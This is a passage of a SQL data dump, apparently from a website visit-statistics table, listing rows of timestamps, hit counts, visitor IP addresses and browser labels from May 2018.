250','other'),(250195,1527288401,1,1,0,0,'54.36.148.76','other'),(250196,1527288516,2,2,0,0,'54.36.148.42','other'),(250197,1527288736,1,1,0,0,'8.29.198.27','other'),(250198,1527288788,1,1,0,0,'54.36.148.89','other'),(250199,1527289133,1,1,0,0,'54.36.148.114','other'),(250200,1527289314,1,1,0,0,'54.36.148.182','other'),(250201,1527289678,1,1,0,0,'157.55.39.168','other'),(250202,1527289821,2,2,0,0,'216.244.66.241','other'),(250203,1527289894,1,1,0,0,'54.36.149.76','other'),(250204,1527289902,1,1,0,0,'54.36.148.31','other'),(250205,1527290120,1,1,0,0,'157.55.39.56','other'),(250206,1527290230,1,1,0,0,'54.36.149.82','other'),(250207,1527290666,1,1,0,0,'54.36.148.253','other'),(250208,1527290887,2,2,0,0,'91.196.178.162','chrome'),(250209,1527290953,1,1,0,0,'54.36.148.69','other'),(250210,1527291002,1,1,0,0,'54.36.148.103','other'),(250211,1527291032,1,1,0,0,'54.36.149.45','other'),(250212,1527291326,1,1,0,0,'54.36.148.173','other'),(250213,1527292168,1,1,0,0,'54.36.148.80','other'),(250214,1527292654,1,1,0,0,'54.36.149.83','other'),(250215,1527292679,1,1,0,0,'54.36.149.98','other'),(250216,1527293123,1,1,0,0,'54.36.148.191','other'),(250217,1527293443,1,1,0,0,'141.8.142.74','other'),(250218,1527293446,1,1,0,0,'54.36.148.46','other'),(250219,1527293669,1,1,0,0,'54.36.148.133','other'),(250220,1527293916,1,1,0,0,'54.165.59.7','other'),(250221,1527294011,1,1,0,0,'54.36.148.69','other'),(250222,1527294090,1,1,0,0,'216.244.66.241','other'),(250223,1527294226,1,1,0,0,'54.36.149.26','other'),(250224,1527294324,1,1,0,0,'54.36.148.199','other'),(250225,1527294489,1,0,1,0,'66.249.70.29',''),(250226,1527294524,1,1,0,0,'8.29.198.27','other'),(250227,1527294655,1,1,0,0,'87.250.224.46','other'),(250228,1527294778,1,1,0,0,'54.36.149.97','other'),(250229,1527294993,1,1,0,0,'157.55.39.56','other'),(250230,1527295272,3,3,0,0,'178.154.171.88','other'),(250231,1527295366,1,1,0,0,'216.244.66.241','other'),(250232,1527296043,1,0,1,0,'66.249.70.29',''),(250233,1527296106,1,0,1,0,'66.249.64.29',''),(250234,1527296314,1,1,0,0,'216.244.66.241','other'),(250235,1527296501,2,2,0,0,'157.55.39.66','other'),(250236,1527297653,1,1,0,0,'51.255.66.115','other'),(250237,1527297902,1,1,0,0,'54.36.149.74','other'),(250238,1527298110,1,1,0,0,'91.209.11.236','other'),(250239,1527298116,1,1,0,0,'216.244.66.241','other'),(250240,1527298345,1,1,0,0,'54.36.148.213','other'),(250241,1527298434,1,1,0,0,'141.8.142.74','other'),(250242,1527298828,1,1,0,0,'54.36.148.81','other'),(250243,1527298961,1,1,0,0,'54.36.148.136','other'),(250244,1527299324,3,3,0,0,'216.244.66.241','other'),(250245,1527299416,1,1,0,0,'54.36.148.118','other'),(250246,1527299505,1,1,0,0,'54.36.148.94','other'),(250247,1527299589,1,1,0,0,'8.29.198.27','other'),(250248,1527299927,1,1,0,0,'91.209.11.236','other'),(250249,1527300153,1,1,0,0,'54.36.148.203','other'),(250250,1527300235,1,1,0,0,'141.8.142.74','other'),(250251,1527300683,1,1,0,0,'95.163.255.99','other'),(250252,1527300697,1,1,0,0,'95.163.255.96','other'),(250253,1527300804,1,1,0,0,'54.36.148.82','other'),(250254,1527301239,1,1,0,0,'54.36.148.72','other'),(250255,1527301504,1,1,0,0,'91.209.11.236','other'),(250256,1527301647,2,2,0,0,'216.244.66.241','other'),(250257,1527301692,1,1,0,0,'54.36.148.198','other'),(250258,1527301992,1,1,0,0,'54.36.148.234','other'),(250259,1527302126,1,1,0,0,'54.36.148.116','other'),(250260,1527302161,1,1,0,0,'54.36.148.111','other'),(250261,1527302534,2,2,0,0,'141.8.142.74','other'),(250262,1527302726,1,1,0,0,'54.36.149.97','other'),(250263,1527302762,1,1,0,0,'54.36.148.217','other'),(250264,1527302996,1,1,0,0,'54.36.148.48','other'),(250265,1527303332,2,2,0,0,'91.209.11.236','other'),(250267,1527303426,1,1,0,0,'54.36.149.15','other'),(250268,1527303455,2,0,2,0,'66.249.64.29',''),(250269,1527303465,1,1,0,0,'207.46.13.30','other'),(250270,1527303702,1,1,0,0,'54.36.148.93','other'),(250271,1527303758,1,1,0,0,'207.46.13.28','other'),(250272,1527304063,1,1,0,0,'54.36.149.44','other'),(250273,1527304167,1,0,1,0,'66.249.64.30',''),(250274,1527304401,1,0,1,0,'66.249.70.27',''),(250275,1527304448,1,1,0,0,'54.36.149.80','other'),(250276,1527304486,1,1,0,0,'54.36.148.71','other'),(250277,1527304554,2,2,0,0,'141.8.142.74','other'),(250278,1527304679,1,1,0,0,'54.36.148.54','other'),(250279,1527305007,1,1,0,0,'91.209.11.236','other'),(250280,1527305345,1,1,0,0,'8.29.198.25','other'),(250281,1527305590,2,2,0,0,'216.244.66.241','other'),(250282,1527305766,1,1,0,0,'54.36.148.170','other'),(250283,1527305796,1,1,0,0,'141.8.142.74','other'),(250284,1527305919,1,1,0,0,'178.154.171.88','other'),(250285,1527305936,1,1,0,0,'54.36.148.195','other'),(250286,1527305960,1,1,0,0,'54.36.149.92','other'),(250287,1527306145,1,1,0,0,'54.36.148.213','other'),(250288,1527306189,1,1,0,0,'54.36.149.58','other'),(250289,1527306415,1,1,0,0,'54.36.149.83','other'),(250290,1527306973,3,3,0,0,'216.244.66.241','other'),(250291,1527306998,1,1,0,0,'54.36.148.80','other'),(250292,1527307016,1,1,0,0,'91.209.11.236','other'),(250293,1527307257,1,1,0,0,'54.36.148.54','other'),(250294,1527307816,1,1,0,0,'54.36.149.23','other'),(250295,1527308891,1,1,0,0,'54.36.148.96','other'),(250296,1527309393,2,2,0,0,'91.209.11.236','other'),(250297,1527309535,1,1,0,0,'216.244.66.241','other'),(250298,1527309861,1,1,0,0,'54.36.148.206','other'),(250299,1527309885,1,1,0,0,'54.36.148.152','other'),(250300,1527309952,2,2,0,0,'141.8.142.74','other'),(250301,1527310037,1,1,0,0,'54.36.148.153','other'),(250302,1527310070,1,1,0,0,'54.36.148.212','other'),(250303,1527310282,1,1,0,0,'54.36.148.68','other'),(250304,1527310346,1,1,0,0,'54.36.149.90','other'),(250305,1527310442,1,1,0,0,'8.29.198.25','other'),(250306,1527310941,1,1,0,0,'216.244.66.241','other'),(250307,1527311086,1,1,0,0,'87.250.224.46','other'),(250308,1527311144,1,1,0,0,'207.46.13.28','other'),(250309,1527311676,1,1,0,0,'91.209.11.236','other'),(250310,1527311700,1,1,0,0,'54.36.148.28','other'),(250311,1527311942,1,1,0,0,'207.46.13.31','other'),(250312,1527311966,1,1,0,0,'54.36.149.81','other'),(250313,1527312304,1,1,0,0,'54.36.148.175','other'),(250314,1527312368,3,3,0,0,'216.244.66.241','other'),(250315,1527312526,1,1,0,0,'54.36.149.47','other'),(250316,1527312633,1,1,0,0,'54.36.149.60','other'),(250317,1527312649,1,1,0,0,'37.9.113.182','other'),(250318,1527313152,2,2,0,0,'141.8.142.74','other'),(250319,1527313349,1,1,0,0,'91.209.11.236','other'),(250320,1527313729,1,1,0,0,'54.36.148.216','other'),(250321,1527314344,1,1,0,0,'87.250.224.46','other'),(250322,1527314361,1,1,0,0,'54.36.149.51','other'),(250323,1527314362,1,1,0,0,'178.154.171.88','other'),(250324,1527314436,1,1,0,0,'54.36.149.43','other'),(250325,1527314482,1,1,0,0,'54.36.149.90','other'),(250326,1527314669,1,1,0,0,'54.36.149.11','other'),(250327,1527314764,1,1,0,0,'180.76.15.154','other'),(250328,1527314769,2,2,0,0,'216.244.66.241','other'),(250329,1527315059,2,2,0,0,'91.209.11.236','other'),(250330,1527315447,1,1,0,0,'54.36.148.252','other'),(250331,1527315917,1,1,0,0,'54.36.148.118','other'),(250332,1527316100,1,1,0,0,'91.196.178.135','firefox'),(250333,1527316164,1,1,0,0,'8.29.198.25','other'),(250334,1527316376,1,1,0,0,'54.36.148.207','other'),(250335,1527316438,1,1,0,0,'216.244.66.241','other'),(250336,1527316478,1,1,0,0,'54.36.148.185','other'),(250337,1527316781,1,1,0,0,'207.46.13.31','other'),(250338,1527316791,2,2,0,0,'91.209.11.236','other'),(250339,1527316887,1,1,0,0,'54.36.149.49','other'),(250340,1527316939,1,1,0,0,'54.36.148.255','other'),(250341,1527317013,1,0,1,0,'66.249.64.28',''),(250342,1527317351,1,1,0,0,'54.36.149.6','other'),(250343,1527317495,1,1,0,0,'54.36.148.154','other'),(250344,1527317580,3,3,0,0,'141.8.142.74','other'),(250345,1527317642,1,1,0,0,'54.36.148.107','other'),(250346,1527318084,1,1,0,0,'54.36.148.126','other'),(250347,1527318196,1,1,0,0,'54.36.148.104','other'),(250348,1527318294,1,1,0,0,'54.36.148.177','other'),(250349,1527318478,1,1,0,0,'213.180.203.7','other'),(250350,1527318525,1,1,0,0,'91.209.11.236','other'),(250351,1527318845,1,1,0,0,'141.8.142.74','other'),(250352,1527319145,1,1,0,0,'54.36.148.110','other'),(250353,1527319755,1,1,0,0,'54.36.148.111','other'),(250354,1527320396,1,1,0,0,'54.36.148.205','other'),(250355,1527320408,2,2,0,0,'91.209.11.236','other'),(250356,1527320814,1,1,0,0,'54.36.148.82','other'),(250357,1527320921,1,1,0,0,'54.36.148.230','other'),(250358,1527320931,1,1,0,0,'54.36.148.160','other'),(250359,1527321064,1,1,0,0,'54.36.149.38','other'),(250360,1527321287,1,1,0,0,'8.29.198.26','other'),(250361,1527321451,3,3,0,0,'178.154.171.88','other'),(250362,1527321586,3,3,0,0,'91.209.11.236','other'),(250363,1527321670,1,1,0,0,'79.111.96.64','msie'),(250364,1527321875,1,1,0,0,'216.244.66.241','other'),(250365,1527322155,1,1,0,0,'141.8.142.74','other'),(250366,1527322221,1,1,0,0,'195.201.23.198','other'),(250367,1527322476,1,1,0,0,'54.36.148.174','other'),(250368,1527322548,1,0,1,0,'66.249.64.30',''),(250369,1527322725,1,1,0,0,'54.36.148.244','other'),(250370,1527322885,1,1,0,0,'130.180.218.221','chrome'),(250371,1527323097,1,1,0,0,'54.36.149.51','other'),(250372,1527323201,1,1,0,0,'91.209.11.236','other'),(250373,1527323495,1,1,0,0,'54.36.149.105','other'),(250374,1527323714,1,1,0,0,'178.154.171.88','other'),(250375,1527323779,1,1,0,0,'54.36.148.173','other'),(250376,1527324145,1,1,0,0,'54.36.148.190','other'),(250377,1527324331,1,1,0,0,'95.163.255.99','other'),(250378,1527324338,1,1,0,0,'54.36.148.24','other'),(250379,1527324360,1,1,0,0,'141.8.142.74','other'),(250380,1527324387,4,4,0,0,'216.244.66.241','other'),(250381,1527324852,1,1,0,0,'91.209.11.236','other'),(250382,1527324875,1,1,0,0,'54.36.148.179','other'),(250383,1527325257,1,1,0,0,'54.36.148.106','other'),(250384,1527325303,1,1,0,0,'178.154.171.88','other'),(250385,1527325411,1,1,0,0,'216.244.66.241','other'),(250386,1527325894,1,1,0,0,'54.36.148.38','other'),(250387,1527326552,2,2,0,0,'216.244.66.241','other'),(250388,1527326684,1,1,0,0,'91.209.11.236','other'),(250389,1527326808,1,1,0,0,'54.36.149.39','other'),(250390,1527326987,1,1,0,0,'8.29.198.25','other'),(250391,1527327077,1,1,0,0,'54.36.149.24','other'),(250392,1527327080,1,1,0,0,'54.36.148.211','other'),(250393,1527327164,1,1,0,0,'54.36.148.175','other'),(250394,1527327381,1,1,0,0,'54.36.148.215','other'),(250395,1527327576,1,1,0,0,'54.36.149.90','other'),(250396,1527327759,2,2,0,0,'91.209.11.236','other'),(250397,1527327990,3,3,0,0,'216.244.66.241','other'),(250398,1527327996,1,1,0,0,'178.95.157.86','chrome'),(250399,1527328558,1,1,0,0,'54.36.149.29','other'),(250400,1527328564,1,0,1,0,'66.249.64.29',''),(250401,1527328586,1,1,0,0,'54.36.148.255','other'),(250402,1527328734,1,0,1,0,'66.249.64.28',''),(250403,1527328871,1,1,0,0,'207.46.13.30','other'),(250404,1527329109,2,2,0,0,'216.244.66.241','other'),(250405,1527329287,1,1,0,0,'34.213.143.112','firefox'),(250406,1527329294,1,1,0,0,'178.154.171.88','other'),(250407,1527329494,1,1,0,0,'141.8.142.74','other'),(250408,1527329507,1,1,0,0,'54.36.148.100','other'),(250409,1527329871,1,1,0,0,'54.36.149.63','other'),(250410,1527329890,1,1,0,0,'54.36.148.253','other'),(250411,1527329954,1,1,0,0,'95.163.255.93','other'),(250412,1527330678,1,1,0,0,'54.36.149.75','other'),(250413,1527330713,2,2,0,0,'216.244.66.241','other'),(250414,1527331034,1,1,0,0,'87.250.224.46','other'),(250415,1527331037,1,1,0,0,'141.8.142.74','other'),(250416,1527331244,1,1,0,0,'54.36.148.241','other'),(250417,1527331343,1,1,0,0,'54.36.148.67','other'),(250418,1527331853,1,1,0,0,'54.36.148.10','other'),(250419,1527331899,2,2,0,0,'91.196.178.89','chrome'),(250420,1527331990,1,1,0,0,'91.209.11.236','other'),(250421,1527332132,1,1,0,0,'8.29.198.25','other'),(250422,1527332332,2,2,0,0,'216.244.66.241','other'),(250423,1527332391,1,1,0,0,'54.36.148.169','other'),(250424,1527332530,1,1,0,0,'141.8.142.74','other'),(250425,1527333284,2,2,0,0,'216.244.66.241','other'),(250426,1527333352,1,1,0,0,'54.36.148.91','other'),(250427,1527333536,1,1,0,0,'54.36.148.199','other'),(250428,1527333757,1,1,0,0,'54.36.149.15','other'),(250429,1527333914,1,1,0,0,'54.36.148.147','other'),(250430,1527333958,1,1,0,0,'54.36.148.135','other'),(250431,1527334239,2,2,0,0,'141.8.142.74','other'),(250432,1527334407,1,1,0,0,'54.36.148.149','other'),(250433,1527334445,1,1,0,0,'54.36.149.42','other'),(250434,1527334460,1,1,0,0,'37.9.113.182','other'),(250435,1527334775,1,1,0,0,'54.36.148.224','other'),(250436,1527334964,1,1,0,0,'216.244.66.241','other'),(250437,1527335025,1,1,0,0,'162.210.196.100','other'),(250438,1527335153,1,1,0,0,'54.36.148.126','other'),(250439,1527335205,1,1,0,0,'141.8.142.74','other'),(250440,1527335571,1,1,0,0,'54.36.148.155','other'),(250441,1527335589,1,1,0,0,'91.209.11.236','other'),(250442,1527336065,1,1,0,0,'95.163.255.92','other'),(250443,1527336078,3,3,0,0,'216.244.66.241','other'),(250444,1527336245,1,1,0,0,'178.154.171.88','other'),(250445,1527336593,1,1,0,0,'95.163.255.98','other'),(250446,1527336999,1,1,0,0,'54.36.148.213','other'),(250447,1527337027,1,1,0,0,'157.55.39.134','other'),(250448,1527337267,3,3,0,0,'216.244.66.241','other'),(250449,1527337486,1,1,0,0,'91.209.11.236','other'),(250450,1527337814,1,1,0,0,'91.196.178.168','chrome'),(250451,1527337816,1,1,0,0,'8.29.198.25','other'),(250452,1527338234,1,1,0,0,'54.36.148.111','other'),(250453,1527338495,1,1,0,0,'54.36.149.72','other'),(250454,1527338643,1,1,0,0,'54.36.148.106','other'),(250455,1527338855,1,1,0,0,'54.36.148.65','other'),(250456,1527338870,1,1,0,0,'54.36.148.135','other'),(250457,1527339247,1,1,0,0,'54.36.148.210','other'),(250458,1527339287,1,1,0,0,'194.187.170.115','other'),(250459,1527339303,1,1,0,0,'54.36.148.38','other'),(250460,1527339372,1,1,0,0,'91.209.11.236','other'),(250461,1527339380,1,1,0,0,'207.46.13.29','other'),(250462,1527339709,1,1,0,0,'141.8.142.74','other'),(250463,1527339797,1,1,0,0,'95.163.255.93','other'),(250464,1527339815,1,1,0,0,'54.36.149.105','other'),(250465,1527339905,1,1,0,0,'54.36.148.26','other'),(250466,1527340376,1,1,0,0,'95.163.255.8','other'),(250467,1527341030,1,1,0,0,'216.244.66.241','other'),(250468,1527341219,1,1,0,0,'95.163.255.94','other'),(250469,1527341251,1,1,0,0,'54.36.148.146','other'),(250470,1527341348,1,1,0,0,'91.209.11.236','other'),(250471,1527341945,1,1,0,0,'54.36.149.35','other'),(250472,1527342220,1,1,0,0,'54.36.149.17','other'),(250473,1527342420,1,1,0,0,'216.244.66.241','other'),(250474,1527342613,1,1,0,0,'54.36.149.88','other'),(250475,1527342795,1,1,0,0,'46.161.9.39','firefox'),(250476,1527342896,1,1,0,0,'91.209.11.236','other'),(250477,1527342983,1,1,0,0,'8.29.198.27','other'),(250478,1527343043,1,1,0,0,'87.250.224.46','other'),(250479,1527343923,1,1,0,0,'91.209.11.236','other'),(250480,1527344138,1,1,0,0,'54.36.149.75','other'),(250481,1527344635,1,1,0,0,'54.36.148.155','other'),(250482,1527344660,1,1,0,0,'61.154.29.32','other'),(250483,1527344796,1,1,0,0,'178.154.171.88','other'),(250484,1527345237,1,1,0,0,'54.36.148.240','other'),(250485,1527345342,1,1,0,0,'54.36.148.172','other'),(250486,1527345356,1,1,0,0,'216.244.66.241','other'),(250487,1527345359,1,1,0,0,'54.36.149.54','other'),(250488,1527345363,1,1,0,0,'141.8.142.74','other'),(250489,1527345370,1,1,0,0,'54.36.149.103','other'),(250490,1527345544,1,1,0,0,'54.36.148.233','other'),(250491,1527345591,1,1,0,0,'91.209.11.236','other'),(250492,1527345811,1,0,1,0,'66.249.64.29',''),(250493,1527346060,1,1,0,0,'54.36.148.43','other'),(250494,1527346134,1,1,0,0,'54.36.148.151','other'),(250495,1527346434,1,1,0,0,'147.135.128.113','other'),(250496,1527346690,1,1,0,0,'54.36.149.64','other'),(250497,1527347100,1,1,0,0,'54.36.149.70','other'),(250498,1527347184,1,1,0,0,'54.36.148.39','other'),(250499,1527347268,1,1,0,0,'95.163.255.95','other'),(250500,1527347639,1,1,0,0,'178.92.85.24','chrome'),(250501,1527347899,1,1,0,0,'216.244.66.241','other'),(250502,1527347923,1,1,0,0,'141.8.142.74','other'),(250503,1527348165,1,1,0,0,'54.36.148.57','other'),(250504,1527348416,1,1,0,0,'54.36.149.71','other'),(250505,1527348440,1,1,0,0,'178.154.171.88','other'),(250506,1527348530,1,1,0,0,'141.8.132.19','other'),(250507,1527348642,1,1,0,0,'8.29.198.26','other'),(250508,1527348800,1,1,0,0,'54.36.148.12','other'),(250509,1527349119,1,1,0,0,'54.36.149.81','other'),(250510,1527349142,1,1,0,0,'54.36.148.59','other'),(250511,1527349146,2,2,0,0,'141.8.142.74','other'),(250512,1527349451,1,1,0,0,'54.36.148.61','other'),(250513,1527349520,1,1,0,0,'54.36.148.104','other'),(250514,1527350051,1,1,0,0,'147.135.128.113','other'),(250515,1527350080,1,1,0,0,'54.36.148.79','other'),(250516,1527350136,1,1,0,0,'95.163.255.6','other'),(250517,1527350655,1,1,0,0,'54.36.149.98','other'),(250518,1527350705,1,1,0,0,'54.36.148.53','other'),(250519,1527350892,1,1,0,0,'37.9.113.182','other'),(250520,1527351375,1,1,0,0,'54.36.148.162','other'),(250521,1527351376,1,1,0,0,'54.36.149.25','other'),(250522,1527351490,1,1,0,0,'54.36.148.204','other'),(250523,1527351543,1,1,0,0,'54.36.149.54','other'),(250524,1527351655,1,1,0,0,'77.111.244.13','chrome'),(250525,1527352089,1,1,0,0,'54.36.149.42','other'),(250526,1527352543,1,1,0,0,'54.36.149.18','other'),(250527,1527352560,1,1,0,0,'54.36.148.56','other'),(250528,1527352578,1,1,0,0,'87.250.224.46','other'),(250529,1527352816,1,1,0,0,'95.163.255.95','other'),(250530,1527352904,1,1,0,0,'54.36.149.25','other'),(250531,1527353175,2,2,0,0,'216.244.66.241','other'),(250532,1527353434,1,1,0,0,'54.36.149.79','other'),(250533,1527353821,1,1,0,0,'8.29.198.26','other'),(250534,1527354300,1,1,0,0,'54.36.149.34','other'),(250535,1527354789,2,2,0,0,'216.244.66.241','other'),(250536,1527354850,1,1,0,0,'54.36.148.229','other'),(250537,1527355596,1,1,0,0,'54.36.149.102','other'),(250538,1527355732,1,1,0,0,'54.36.148.192','other'),(250539,1527355821,1,1,0,0,'91.209.11.236','other'),(250540,1527355992,1,1,0,0,'216.244.66.241','other'),(250541,1527356210,1,1,0,0,'54.36.148.147','other'),(250542,1527356302,1,1,0,0,'54.36.148.231','other'),(250543,1527356535,1,1,0,0,'54.36.149.29','other'),(250544,1527356564,1,1,0,0,'54.36.148.232','other'),(250545,1527356653,1,1,0,0,'54.36.148.73','other'),(250546,1527356655,1,1,0,0,'54.36.148.206','other'),(250547,1527356694,1,1,0,0,'54.36.148.137','other'),(250548,1527357096,1,1,0,0,'54.36.149.84','other'),(250549,1527357182,1,1,0,0,'66.249.64.30','chrome'),(250550,1527357208,1,1,0,0,'54.36.148.227','other'),(250551,1527357900,1,1,0,0,'54.36.148.133','other'),(250552,1527358174,1,1,0,0,'54.36.149.56','other'),(250553,1527358191,1,1,0,0,'54.36.148.196','other'),(250554,1527358297,1,1,0,0,'216.244.66.241','other'),(250555,1527358420,1,1,0,0,'37.9.113.182','other'),(250556,1527358695,1,1,0,0,'54.36.149.94','other'),(250557,1527359321,1,1,0,0,'207.46.13.30','other'),(250558,1527359440,1,1,0,0,'54.36.149.103','other'),(250559,1527359475,1,1,0,0,'8.29.198.27','other'),(250560,1527359687,2,2,0,0,'216.244.66.241','other'),(250561,1527359910,1,1,0,0,'54.36.148.153','other'),(250562,1527360144,2,2,0,0,'141.8.142.74','other'),(250563,1527360835,1,1,0,0,'54.36.148.70','other'),(250564,1527360992,1,1,0,0,'54.36.148.122','other'),(250565,1527360993,3,3,0,0,'216.244.66.241','other'),(250566,1527361134,2,2,0,0,'141.8.142.74','other'),(250567,1527361673,1,1,0,0,'54.36.148.57','other'),(250568,1527361836,2,2,0,0,'91.196.178.161','chrome'),(250569,1527362096,4,4,0,0,'178.154.171.88','other'),(250570,1527362438,3,3,0,0,'216.244.66.241','other'),(250571,1527362489,2,2,0,0,'141.8.142.74','other'),(250572,1527362541,1,1,0,0,'54.36.148.103','other'),(250573,1527362575,1,1,0,0,'54.36.149.24','other'),(250574,1527362663,1,1,0,0,'54.36.148.45','other'),(250575,1527363434,1,1,0,0,'54.36.148.63','other'),(250576,1527363504,1,1,0,0,'54.36.148.210','other'),(250577,1527363528,1,1,0,0,'216.244.66.241','other'),(250578,1527363542,1,1,0,0,'178.62.137.173','chrome'),(250579,1527364017,1,1,0,0,'87.250.224.46','other'),(250580,1527364020,1,1,0,0,'37.9.113.110','other'),(250581,1527364068,1,1,0,0,'217.182.252.214','other'),(250582,1527364084,1,1,0,0,'54.36.148.125','other'),(250583,1527364668,1,1,0,0,'8.29.198.25','other'),(250584,1527365108,1,1,0,0,'157.55.39.134','other'),(250585,1527365404,1,1,0,0,'54.36.149.26','other'),(250586,1527365499,1,1,0,0,'54.36.148.38','other'),(250587,1527365682,1,1,0,0,'141.8.142.74','other'),(250588,1527365790,1,0,1,0,'66.249.70.7',''),(250589,1527366070,1,1,0,0,'216.244.66.241','other'),(250590,1527366074,2,2,0,0,'54.36.148.241','other'),(250591,1527366104,1,1,0,0,'54.36.148.169','other'),(250592,1527367090,1,1,0,0,'204.79.180.4','msie'),(250593,1527367593,1,1,0,0,'95.163.255.97','other'),(250594,1527368215,1,1,0,0,'54.36.148.64','other'),(250595,1527368316,1,1,0,0,'54.36.149.80','other'),(250596,1527368560,1,1,0,0,'54.165.59.7','other'),(250597,1527369104,1,1,0,0,'95.163.255.99','other'),(250598,1527369683,1,1,0,0,'54.36.149.66','other'),(250599,1527369685,3,3,0,0,'54.165.59.7','other'),(250600,1527369744,1,1,0,0,'54.36.148.233','other'),(250601,1527369995,1,1,0,0,'216.244.66.241','other'),(250602,1527370069,48,48,0,0,'192.99.69.242','other'),(250603,1527370090,1,1,0,0,'54.36.149.106','other'),(250604,1527370301,1,1,0,0,'8.29.198.25','other'),(250605,1527370666,1,1,0,0,'91.209.11.236','other'),(250606,1527370972,1,1,0,0,'54.36.148.155','other'),(250607,1527371199,3,3,0,0,'216.244.66.241','other'),(250608,1527371323,1,1,0,0,'54.36.148.116','other'),(250609,1527371445,1,1,0,0,'54.36.149.89','other'),(250610,1527371627,1,1,0,0,'54.36.148.92','other'),(250611,1527372240,1,1,0,0,'54.36.149.28','other'),(250612,1527372631,1,0,1,0,'66.249.64.28',''),(250613,1527373060,1,1,0,0,'95.163.255.96','other'),(250614,1527373065,1,0,1,0,'66.249.70.27',''),(250615,1527373114,1,1,0,0,'216.244.66.241','other'),(250616,1527373472,2,2,0,0,'54.165.59.7','other'),(250617,1527373494,1,1,0,0,'54.36.148.105','other'),(250618,1527373538,1,1,0,0,'54.36.149.34','other'),(250619,1527374190,1,1,0,0,'178.154.171.88','other'),(250620,1527374319,1,1,0,0,'54.36.148.41','other'),(250621,1527374362,1,1,0,0,'216.244.66.241','other'),(250622,1527374385,1,1,0,0,'54.36.148.150','other'),(250623,1527374928,2,2,0,0,'54.165.59.7','other'),(250624,1527374929,1,1,0,0,'54.36.148.248','other'),(250625,1527375272,1,1,0,0,'54.36.149.26','other'),(250626,1527375390,1,1,0,0,'207.46.13.29','other'),(250627,1527375513,1,1,0,0,'8.29.198.26','other'),(250628,1527375637,1,1,0,0,'216.244.66.241','other'),(250629,1527375641,1,1,0,0,'54.36.149.35','other'),(250630,1527375904,1,1,0,0,'54.36.148.151','other'),(250631,1527376109,1,1,0,0,'54.36.148.33','other'),(250632,1527376344,1,1,0,0,'54.36.149.25','other'),(250633,1527376452,1,1,0,0,'54.36.148.117','other'),(250634,1527376576,2,2,0,0,'216.244.66.241','other'),(250635,1527376796,1,1,0,0,'54.36.148.109','other'),(250636,1527376798,1,1,0,0,'54.36.149.40','other'),(250637,1527377157,1,1,0,0,'162.210.196.129','other'),(250638,1527377377,1,0,1,0,'66.249.64.29',''),(250639,1527377379,1,1,0,0,'54.36.149.0','other'),(250640,1527377385,1,1,0,0,'54.36.148.228','other'),(250641,1527377675,1,1,0,0,'54.36.149.21','other'),(250642,1527377740,25,25,0,0,'147.135.128.113','other'),(250643,1527377751,1,1,0,0,'207.46.13.29','other'),(250644,1527378033,2,2,0,0,'216.244.66.241','other'),(250645,1527378645,24,24,0,0,'147.135.128.113','other'),(250646,1527378759,1,1,0,0,'54.36.148.142','other'),(250647,1527378937,1,1,0,0,'95.163.255.96','other'),(250648,1527379551,26,26,0,0,'147.135.128.113','other'),(250649,1527379886,1,1,0,0,'54.36.148.65','other'),(250650,1527381056,1,0,1,0,'66.249.64.30',''),(250651,1527381101,1,1,0,0,'54.36.148.122','other'),(250652,1527381123,1,1,0,0,'8.29.198.25','other'),(250653,1527381588,1,1,0,0,'54.36.149.38','other'),(250654,1527382029,2,2,0,0,'216.244.66.241','other'),(250655,1527382594,1,1,0,0,'54.36.148.210','other'),(250656,1527382632,1,1,0,0,'54.36.148.126','other'),(250657,1527382674,1,1,0,0,'54.36.148.28','other'),(250658,1527383072,1,1,0,0,'54.36.148.56','other'),(250659,1527383085,1,1,0,0,'141.8.142.152','other'),(250660,1527383245,3,3,0,0,'216.244.66.241','other'),(250661,1527383422,1,1,0,0,'54.36.148.180','other'),(250662,1527383525,1,1,0,0,'54.36.148.253','other'),(250663,1527383934,1,1,0,0,'54.36.149.26','other'),(250664,1527384241,1,1,0,0,'54.36.148.12','other'),(250665,1527384852,2,2,0,0,'141.8.142.74','other'),(250666,1527384918,1,1,0,0,'216.244.66.241','other'),(250667,1527385028,1,1,0,0,'54.36.148.118','other'),(250668,1527385346,1,1,0,0,'207.46.13.30','other'),(250669,1527385608,1,1,0,0,'95.163.255.98','other'),(250670,1527386132,2,2,0,0,'216.244.66.241','other'),(250671,1527386182,1,1,0,0,'54.36.148.217','other'),(250672,1527386348,1,1,0,0,'8.29.198.27','other'),(250673,1527386550,1,1,0,0,'54.36.149.8','other'),(250674,1527386616,1,1,0,0,'54.36.148.14','other'),(250675,1527386700,1,1,0,0,'178.154.171.88','other'),(250676,1527386776,1,1,0,0,'54.36.149.105','other'),(250677,1527387030,1,1,0,0,'54.36.149.63','other'),(250678,1527387371,1,1,0,0,'54.36.148.69','other'),(250679,1527387516,1,1,0,0,'54.36.149.74','other'),(250680,1527387706,1,1,0,0,'216.244.66.241','other'),(250681,1527387720,1,1,0,0,'54.36.148.59','other'),(250682,1527387916,1,1,0,0,'54.36.148.15','other'),(250683,1527387968,1,1,0,0,'54.36.148.175','other'),(250684,1527388646,1,0,1,0,'66.249.64.29',''),(250685,1527388718,18,18,0,0,'69.30.234.2','other'),(250686,1527388734,1,1,0,0,'54.36.148.43','other'),(250687,1527389091,1,1,0,0,'54.36.148.250','other'),(250688,1527389182,1,1,0,0,'54.36.149.13','other'),(250689,1527389554,1,1,0,0,'54.36.148.55','other'),(250690,1527389650,1,1,0,0,'54.36.148.112','other'),(250691,1527389681,2,1,1,0,'66.249.64.30',''),(250692,1527390012,1,1,0,0,'54.36.148.186','other'),(250693,1527390267,1,1,0,0,'216.244.66.241','other'),(250694,1527390584,1,1,0,0,'141.8.142.196','other'),(250695,1527390777,1,1,0,0,'54.36.149.55','other'),(250696,1527391471,2,2,0,0,'216.244.66.241','other'),(250697,1527391614,1,1,0,0,'54.36.148.133','other'),(250698,1527391948,1,1,0,0,'8.29.198.26','other'),(250699,1527392575,1,1,0,0,'54.36.148.108','other'),(250700,1527392922,1,1,0,0,'216.244.66.241','other'),(250701,1527393024,1,1,0,0,'54.36.149.11','other'),(250702,1527393212,1,1,0,0,'54.36.148.150','other'),(250703,1527393366,1,1,0,0,'54.36.148.21','other'),(250704,1527393734,2,2,0,0,'148.251.8.250','other'),(250705,1527393948,2,2,0,0,'54.36.149.99','other'),(250706,1527393974,1,1,0,0,'216.244.66.241','other'),(250707,1527394570,1,1,0,0,'54.36.149.91','other'),(250708,1527394609,1,1,0,0,'37.9.113.182','other'),(250709,1527394741,1,1,0,0,'95.220.218.111','msie'),(250710,1527394967,1,1,0,0,'54.36.149.47','other'),(250711,1527395123,3,3,0,0,'216.244.66.241','other'),(250712,1527395536,1,1,0,0,'54.